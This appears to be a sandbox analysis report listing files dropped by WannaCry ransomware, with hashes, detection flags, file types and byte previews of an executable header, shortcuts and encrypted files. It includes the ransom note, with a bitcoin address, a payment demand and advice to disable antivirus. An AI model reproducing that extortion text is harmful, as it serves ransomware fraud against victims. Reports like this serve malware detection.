                                                  SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):245760
                                                  Entropy (8bit):6.278920408390635
                                                  Encrypted:false
                                                  SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                  MD5:7BF2B57F2A205768755C07F238FB32CC
                                                  SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                  SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                  SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\cscript.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7891074325900505
                                                  Encrypted:false
                                                  SSDEEP:12:K0Np0hOjDECUi350o7fQKkaN7af73QGwSpi8e8tUAG3dwCmDlPvDNLnfuhWia/sn:K04i5RRN7aDQmmAGlmh1mek/wDBJpsOi
                                                  MD5:610CEA6428D56E4BD7B4A1F0AE85D610
                                                  SHA1:34E99353C6A1AC6C14CF62B7374EA86F051B58F8
                                                  SHA-256:9547E72138763DB1AEA4F014FEA8AA71D95811E156A0A4982F7E157CF402EAE3
                                                  SHA-512:F30B1E6B1DAA4C74DD9D15E802927C277DEDEDA91FBBD4C263DA3FF18E81AE0CEBDD70C31C91F994BB7B832CDFF3DE773D5A0F5DB85A5286AA21C29BA521D7C3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.834343836439562
                                                  Encrypted:false
                                                  SSDEEP:24:bk9AwFdP/7tsls9Gb6JCcjyt9yKZnqftDiFJm8xmrMUEZWWVFMmj:bk9LRelpb6Jw9yGnqfVsjUAZ
                                                  MD5:0CDF46E453459520C79E727AD74D9A5A
                                                  SHA1:92C04584BD494524493053D3512AF543F7674354
                                                  SHA-256:E1F0B9B5C618C76828FE7077E4ED24C0E88C13E5B6434D058743AEE07CDF63B7
                                                  SHA-512:5C1481EBC1EB25ECE06D3B8727834B7128104D9B45456B7B8ED0463EAC33BBB87BF461FC93BF87B029EE5AF0EFE065F82C77B7815DD2384FE28157CA5B0B05B8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....v3J.k....d.`..l=.....^..%.F....t.S1%.`...)..G...&.o...L.Z..[jBz..Q..L8$.,E7ZT.....n#N-T........w..l)w.W...xo.0|qN..;..]n=o.US.N..W..>..,]._....(.\...x..2.\xd...G...b....Fr...r(C....=.I.>s....h=YOtXA...+.Z29...2.I...`..".DD..:...z..M..T.f....@...............,fo.4..k.....'p...`..:&....k.IL#...0....&.......H.3.>K...6.@ 71.M...g..u".}.y......3P..c..g.=........p.NJ..!...E.s.ch.s..8...k....8u.........`...t.7v..R....J....v>....}....'Ry.35....:....!d...3+.&.m.f..H..*..A.6...J.@V6.\.Qx .(.....8...G...'.).F.v.0.]uA...A..D...2.W.L..B.l.,!.U.?...v..$...p`.;.-.z.....8W;.l.....o..*L.m.5...s...."...?.{././b..]1..'.B.J6L..i#zr....S4...#.D...'....D.,T.K........4.8O...=..h.{.A.x...j]vN......./.R.e.......G:..L....}bM...4....b3F.+m.).Q:...m..-.[....ysv3Y...9.(..Cf...HY>X..]6h..v..'9.K...h.^Ym...3m[.K...L.J.<.E..t:Zy..Z..".`.m../..dg...M....3SX'K....Zy.[.r....%.L...$..+.....6....2}.]UA....T[..0.D.9.[Lc...x: ..................Pm...-..h8DLH...G.5..'...
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:OpenPGP Public Key
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.799921555501172
                                                  Encrypted:false
                                                  SSDEEP:24:qucE/o/2oDShx9qS+zu8OutH4BMa3GSqPg6qL8ue2/vjQhg:q3uUSha1zuxGXPZmem
                                                  MD5:DF4AA61F413063D04995DCF91F674D1E
                                                  SHA1:C2AFA5936CCAC4043DF376EBE004887EDB35C4D5
                                                  SHA-256:3C9A6740782AA91F7F72E203B6883359A409AE591B697651B43A3C8A2C004A4B
                                                  SHA-512:E856F14F7C4C3F61D3E1D7BBF21AED404716555CEB5FFA6519FFB305241F1213D61FEC1FD374BEE97359A3135F49B4628A84CD02307FFB821ECD210B49FA2DA2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.856561791528855
                                                  Encrypted:false
                                                  SSDEEP:24:bkeHOWvkXhZ8oO/9WIV3DivjjAPwuF5q8sBpjD2EJiA4acpyCTYE:bkeHOWvkXhSl/cIV+7jS/q8YFJiAZCT7
                                                  MD5:1B0DAB685CD90464360A0826A672365E
                                                  SHA1:DBC40AB16D41FE173C61F4140CAD2591D4312AE4
                                                  SHA-256:26F4B5DD8B74FCA54C48A305D9EED5F9BBAED1FED31373A3F6AE1F8BC76A2375
                                                  SHA-512:1EF49E1D4ECDA7EDB6FBC72ACD97DAC9061AC8D37066C045041ADD2C18118E43B8DF03E53411EBD6DD05F1959ACDD85B6B8EBA43EB8167C09FAB1B57B34471D0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....S.."._"..qNM'(.s.d5.$&.....$DT.`...J.}..;....5,..........7.........N..+o.c.C..t...o..X15.......{n........=.X\^..r..e......8.y...N.R19.{..?..Oab..`.ET...8t."...b.x..O..f<4...1.ag..5.m.?9..B....yKwd........I....*.d........mQ......g.^.U................~..N..6.....b.......F..@...O]A....`.........:Y..'.7%.L...t.MG...Hj!.....-...!..^..G.L...#..}..L.k.`.T/.(.*.$...^.E./.|n.KO.l....r..?..#6........"~..{."F.....n.2...r=...#.sb....3.8.*....<e.#.4.-.(..g&.J3....}.=L.....B.Dy...bY..$.,s.?....B..3.........e..W!.+.V.....M..~8"e......J.-F....v.H.......?.x.;Sm4.r?..._.M&=..:..q.W....eM.;0#.=.y.<q.#!..f.M.N.].gq|aEK...C..PO)..I..s..`:*a@`..sy..fN.@D.h.`*.+.eF...._.r.k.........7F......l...T..._rM..b.@..d1....vQ.)..K........\!.O....h.;..aH.+'...:......T.N..#b.G......e....dS. YQ#....,.B...v..yc.q).[...F..?..3A...(\.&.:1."[.1ks... 3....=...`..p...+..B...VI\6.w.z.......ye..c...../...W!.w9.W...N..&..>...<Q@.GD...>......J0+..CF....T.2o
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.81632071911657
                                                  Encrypted:false
                                                  SSDEEP:24:ITFvD5hx/5oFFSIxKhaW+pft33QZmg2whnpssX1MFDR+feTr:0FvfxBASTbQF3ut5XuFkWTr
                                                  MD5:F8A5123CA0ED821F6F64D501F813988F
                                                  SHA1:F4EF3DD652E349F053B3086B49620256CCBF1C3F
                                                  SHA-256:0235EBC962844215FF04915223E57D53196C4E958493B8C4A1F3B6C5D6B78035
                                                  SHA-512:B9B321B2E1488EF72911F9DE2BDE81E73397E53344BB20CF0883F5F22D7DF797CE15B7F4D94733C1F25FC03AABD4A54B552AF95783B126E3AF777D450163E9FF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.846832548568931
                                                  Encrypted:false
                                                  SSDEEP:24:bkho+gmM4Fq7l/8vC35ToM1ROXNI2d+uOkSE8gnftdI29pk:bkK+hMN7ivC3VoM1ROXBd+ISMnVdHM
                                                  MD5:0BCB104919493FDCB8B76896C16387A0
                                                  SHA1:0979538B61375F4E11BFAE7343DBAED27CECAEB5
                                                  SHA-256:DDB516870F1C99F4116341D0380F626AF8EDA272AF2724AD936DD79C078AD69C
                                                  SHA-512:CC590C109B326B96FE8019962E4E1DD5FD7F9B4D5C3A1704C0DDA8E8455BEC071249D64771C0BDECC004F53492302C9BD936D0D048D309F6577ABDD64DF2F90F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!...........{q.04.\3.:.....0.N.......+....r.g.H....~N..z.,C%..(!.RY...oeV...9..H.....k.O4...n..\.._..$.\.........x.w.^...}..N,@-aA;..Y..|..>....G..sta.8Zr/xj..k....#0u..(.5w.7..c..8..>v.jd.K.I....Yb.f*..@~..a....<.).dFuO._.0.BK"..D.. <)....C...r<xGj..]w............ ..............B....8.T)..P$...8Gl..9..o?I.f(e.H....0.^.=..~..h..m.N[.:K.4...Pmc.0....;..;.0./\sb..7<(.......@........g....w#...C...yL....>5,...Z.O..0....S....]2g.fd.i..Y..g<..M..r1h.../.N...Y...g]Cov..Dn...2.p.).D.%..|..|R(..8...?#.I.=...f....35z.!wk...u..O............KA....f...+.v..~W.....IT.....5..m........1...6k......K....qr.w....%...}eK....w......q..rb.3.9.s..V.E.*......A..b.&.8.HYe.._...o....D.l8.o~'ua&.V.........C...Mn.2.Nl.x}..%Q.A(.ee._n'.QY.....^...P..8.dk....W,.........}........u........O...2.?...AI8+d.3CB.....N...=`,q>..d .q}..%.)......OW......~Q...PB.o5(...q+.].q.....0_|d....fV...ZkSual.....G.".Z.Q>...3.'.F....n..e.p.y.4.....y..7bs...c..7./z".!...s...B.jN{.
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.825044871503022
                                                  Encrypted:false
                                                  SSDEEP:24:5AvgJmSNZj6YiA4JGHFXJbL7Um8Y+i0e6YyMyVC02w:evgJmQOAtZJfINY+G6YyMEh
                                                  MD5:BCC0779388487EF6F69C9B1D479E713C
                                                  SHA1:0D113DAAB6BA8A93B5381EF0433DC52BFDDFEA44
                                                  SHA-256:FAC97E995D83AECBB71576223E0E917335E4788AFCF66058EDEF1C5EF4E58D62
                                                  SHA-512:0C4734F7FA1B4A845F4882A93ABE94683FDA565DF39ACC6FB76A469196F422EA71F779F51AA9BEBA63266331B7A1AB648FF98798B6AF87AC5014EE0A01B8F884
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851544587590097
                                                  Encrypted:false
                                                  SSDEEP:24:bkEdjupj3q1O/zzwcJ9xLykglwnb6NvcpGzxVVrfXzB8lLGHEZoj5u68kzC5Ieh0:bkMy33/jbylSnb67djjB8R2o68k+5bvc
                                                  MD5:378900F9E5C10732DCC9746585F05D80
                                                  SHA1:745DE6893E23EA3C891773EEE2BCEB0964EA199A
                                                  SHA-256:BE94421D84E80D75B3AA574B40A21900ABA323D3151FFAF5DEEA77C2103448CA
                                                  SHA-512:E89CC8670D34AFB2B58424C5183E231A5C1AB5D08295AD7D74AF5AC30E8850DF90A4F43BAADEE5BDBEBE05E1554DC21DF43F4C922928491CE879A1BAC3A5743D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......cM..4T.:/.........y....I.-rU.a....@s..J..L .fHu...G......q....0..2V.x.;5.<.....D.H.;..K....v....I..0...Y>'.[Z..eT.E.!\&....F.8.f.T...*QTb..f.y...3......5(iy.(N.dc..l........m..d..+...&...-Ji..2..H..A2.3....U.p.3..1U......[PB....=.:..;r.va.6..A.............~......`.g^]..Y9G.@...L}1}..% 2.N.=Sl....b*.n.Lp..X...r*J...]...m.g|.Jn....<..K.....ma?M..=>.Y ....f.@~.V.I.R.......W.ct.n$8VO.......).Om.Z9..7>.-.%..l...<........z.-K.....0.G:T ._cD^.8W..$..Cn.K.4.o.......].e~d....\.......8...o.dt......~.#......'..\....x..B[...8.F?\.../U6...v..c..m..t..[.y.2..j....#YR....g.'.0.M.=.I.._.6d.n..y.g..9.Hm..O.3..NL.=..2.....1)Ux@...h...yh........BSb..s....rn7R)}M......84..h.]2b@..%..W.6j.v?..:.....yt...h....t.d......&y!*?..\.>8I....i...!..h4......(.h).L..qs`.t...-.&=\..85.Xn}G2Nm.j.+.B..^;......... ..Z$.5K.4.....N.PC.P.D.......}.E.p%.x.iK.aZd."...'.y>Y...s.Q..CR.b.$+...].B..C.q}..?....s.>CS.H1\....4..7.."y-...)j.?%.q....$5.,........7.\w...$...
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851544587590097
                                                  Encrypted:false
                                                  SSDEEP:24:bkEdjupj3q1O/zzwcJ9xLykglwnb6NvcpGzxVVrfXzB8lLGHEZoj5u68kzC5Ieh0:bkMy33/jbylSnb67djjB8R2o68k+5bvc
                                                  MD5:378900F9E5C10732DCC9746585F05D80
                                                  SHA1:745DE6893E23EA3C891773EEE2BCEB0964EA199A
                                                  SHA-256:BE94421D84E80D75B3AA574B40A21900ABA323D3151FFAF5DEEA77C2103448CA
                                                  SHA-512:E89CC8670D34AFB2B58424C5183E231A5C1AB5D08295AD7D74AF5AC30E8850DF90A4F43BAADEE5BDBEBE05E1554DC21DF43F4C922928491CE879A1BAC3A5743D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.816488491819429
                                                  Encrypted:false
                                                  SSDEEP:24:mP0nagnuWOqkJV1fAez64SMXHEi7Kks6O0Q6nFPmuPP6:mMnwWODJVBFlHEiNsUQ6n0ua
                                                  MD5:A7AA06E714AFAD3E085BA0F5D7353939
                                                  SHA1:CDE0A010FE7544C646882EA7C503EE3701D67955
                                                  SHA-256:C3C6DF164895B3F81C6B3F3ADDE7CD114DEDA9CE30C852B255D5E8518EF51204
                                                  SHA-512:85B7D818C47F104FB70E7B739A59E12044F6C8DAC22D536EA1012D51CE9CB3503ABEA228F3B58D7F1EE2FE9E930770C2D842A46435527C11ACE464C17668F18D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851700738108694
                                                  Encrypted:false
                                                  SSDEEP:24:bkSXKARmQO/enU6Aw3QHUXq6929nEesif64Km4AY6qFHryNVDbClmHw:bkS65/enUvUXf29nKu74AY6+2NRCX
                                                  MD5:BE409C9E0745A9515B4F613B130D2E93
                                                  SHA1:28CD61B0344C94D44A9C35F9D3398724406D6AD3
                                                  SHA-256:C6EE97A42721F31D33A8E8E3A955D8233191C83603631A6F86D41B274DB70C90
                                                  SHA-512:74ECDF6A5BB1482EB667F9FF898F7EB1692C27566D890E41B97D56972013EE46D2FCE438B8A511E360ABF38FDFB64D4AE6C6000554CD5433FE9BC24580FA40A2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851700738108694
                                                  Encrypted:false
                                                  SSDEEP:24:bkSXKARmQO/enU6Aw3QHUXq6929nEesif64Km4AY6qFHryNVDbClmHw:bkS65/enUvUXf29nKu74AY6+2NRCX
                                                  MD5:BE409C9E0745A9515B4F613B130D2E93
                                                  SHA1:28CD61B0344C94D44A9C35F9D3398724406D6AD3
                                                  SHA-256:C6EE97A42721F31D33A8E8E3A955D8233191C83603631A6F86D41B274DB70C90
                                                  SHA-512:74ECDF6A5BB1482EB667F9FF898F7EB1692C27566D890E41B97D56972013EE46D2FCE438B8A511E360ABF38FDFB64D4AE6C6000554CD5433FE9BC24580FA40A2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.76968202850599
                                                  Encrypted:false
                                                  SSDEEP:24:rJma9DfS/rKJMifTHs+plIgi3jDIihV8IdgE:rJLtKzKvTHp53CC3E
                                                  MD5:79E68F1DCC5E07C5FBABAD70553F522C
                                                  SHA1:A0C6FD94C8E0BD670C1B32194DF55C4E7D49A317
                                                  SHA-256:E3AFA68887AB4FC363E29A0B074E8BC8BB6F187CB9243EFD8DACFC8FBF868E9A
                                                  SHA-512:DA71F5EB73AEAAF1295D602CEC68A4C2251ED7AA2FEE02DDDC39CF8BDB4D952E6975A99FF956199F69A1F8A1EB437BE52CDED43D00C437AB2C1AA4676885A5CC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8328813258023375
                                                  Encrypted:false
                                                  SSDEEP:24:bkMsgzJl+zUzXBlLnIE7BX5H5qTq1V5NT2v4F9IJWMMvI06N:bkhg9vzXLnLh5ZqTq75wvkJlW
                                                  MD5:231114D2E1EB0A22FCE689955F75711F
                                                  SHA1:EC4A3BA8E79F70FE70D8BE5411DBB98528A961DF
                                                  SHA-256:76F9AEAD7EBCC5C9FB0180E592D4080A18817056EA6B2C40CF884432BB00CCBC
                                                  SHA-512:C91823E367926AEB69FCF6811EEA09EA8646317525BAEE4C5E87245E2CAAD6B4A7C64CE89128EE987464E0A82A139832F304892C0BDC34F717EC0700B586C850
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8328813258023375
                                                  Encrypted:false
                                                  SSDEEP:24:bkMsgzJl+zUzXBlLnIE7BX5H5qTq1V5NT2v4F9IJWMMvI06N:bkhg9vzXLnLh5ZqTq75wvkJlW
                                                  MD5:231114D2E1EB0A22FCE689955F75711F
                                                  SHA1:EC4A3BA8E79F70FE70D8BE5411DBB98528A961DF
                                                  SHA-256:76F9AEAD7EBCC5C9FB0180E592D4080A18817056EA6B2C40CF884432BB00CCBC
                                                  SHA-512:C91823E367926AEB69FCF6811EEA09EA8646317525BAEE4C5E87245E2CAAD6B4A7C64CE89128EE987464E0A82A139832F304892C0BDC34F717EC0700B586C850
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.802905153358807
                                                  Encrypted:false
                                                  SSDEEP:24:mFlZaLqINNM7vad6xWRIieMh50uHM6ceLbnnXMq:m1aLqINNSad6xWRIiDh5Zs8n8q
                                                  MD5:6956AB587CC992071A6C4F586D677948
                                                  SHA1:04D586ACA852F4412DE330A0998F49F704A0EFC6
                                                  SHA-256:E104E1C1A6532BC1ADCE6FCAD376134DFCB5BB97E6CEC589D08BBDA0FAD68A23
                                                  SHA-512:AA271610BE37E0925B4282592DD8D7470EDB367DBA2D749C848B59719DA12C046B041CE97DB3170B238A735C48EFE919F091EEEE3D6A00CD351B56D95C31E2C5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.855615998473397
                                                  Encrypted:false
                                                  SSDEEP:24:bkVEVKxCxoeH7DM/7++XhY/qr21W3YpG0Q4sSN4l/u/gKW0WBbC/Jm93+r:bkqKxCxo2Dm7++XcM2M3YJhmu/ZW0WRa
                                                  MD5:E3D9D563443856AF38393E29AB651A30
                                                  SHA1:63E623F249A9552B610E6ADBB8CEADAAAD19CB77
                                                  SHA-256:4F8061C91CCAEF616B29C409064099C6889F56E5E295100CF3614B7E92D686B4
                                                  SHA-512:3DF52BE0F0915F99381B75093C2EAECED18ADB4693A06EE7C33B19C9D68BAE701B3B2C027A0F1D5A109A3B5FED9132783C4879E924CBBEF33AD3482C86E1634C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.855615998473397
                                                  Encrypted:false
                                                  SSDEEP:24:bkVEVKxCxoeH7DM/7++XhY/qr21W3YpG0Q4sSN4l/u/gKW0WBbC/Jm93+r:bkqKxCxo2Dm7++XcM2M3YJhmu/ZW0WRa
                                                  MD5:E3D9D563443856AF38393E29AB651A30
                                                  SHA1:63E623F249A9552B610E6ADBB8CEADAAAD19CB77
                                                  SHA-256:4F8061C91CCAEF616B29C409064099C6889F56E5E295100CF3614B7E92D686B4
                                                  SHA-512:3DF52BE0F0915F99381B75093C2EAECED18ADB4693A06EE7C33B19C9D68BAE701B3B2C027A0F1D5A109A3B5FED9132783C4879E924CBBEF33AD3482C86E1634C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.832741916318372
                                                  Encrypted:false
                                                  SSDEEP:24:H43gtwCmQg2DcT31E2iLEbx5/erBbwd0ptGgqXrQQFD:pTmoD+31CLyx5/iBttGl7nJ
                                                  MD5:CFFDDB2A7B723F1893B65F6F49CA33E5
                                                  SHA1:8D6492AE40DDC55F60CE73732001EE37B1E07A73
                                                  SHA-256:653E4D8D5D307651578323A7CBAE9C59A7AE1A76C95D84DB49E32D7B5B8AAE5A
                                                  SHA-512:EC65305B9805634B3C1DE2C0DA4ABBE78CEC1D233653F7D1E554B92C9C0E26D681A0C05CC0CA16B3521A8A3AFCC764BC74DEE73FB58A951651624C698B8F7586
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.830648899192845
                                                  Encrypted:false
                                                  SSDEEP:24:bkR8Avu2TATL8hjku7ErmukFA/qOHTGcyvhr8cmI2V4PMMCQBgqdGxfPB:bkR8CuIoPkRKFqgI2oBOG8PB
                                                  MD5:D1D6C1CBEEB2F8CD9A638ACD113D7839
                                                  SHA1:CF189F8E3F0DFFF85BE3B969DFCF10F57A5167D0
                                                  SHA-256:35BDA811A0010540F563175697657F6A1536008C04A2D0D430C7BE53736B0817
                                                  SHA-512:C8F14ABD2765A4699C726894E34F6EE35C06698881E2F43A613004DD39F6A375FC52003E4996F992AC061BBA345AC38A1BDF21D5DCFAB77A96780F48B7D3AD78
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.830648899192845
                                                  Encrypted:false
                                                  SSDEEP:24:bkR8Avu2TATL8hjku7ErmukFA/qOHTGcyvhr8cmI2V4PMMCQBgqdGxfPB:bkR8CuIoPkRKFqgI2oBOG8PB
                                                  MD5:D1D6C1CBEEB2F8CD9A638ACD113D7839
                                                  SHA1:CF189F8E3F0DFFF85BE3B969DFCF10F57A5167D0
                                                  SHA-256:35BDA811A0010540F563175697657F6A1536008C04A2D0D430C7BE53736B0817
                                                  SHA-512:C8F14ABD2765A4699C726894E34F6EE35C06698881E2F43A613004DD39F6A375FC52003E4996F992AC061BBA345AC38A1BDF21D5DCFAB77A96780F48B7D3AD78
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.822510363879958
                                                  Encrypted:false
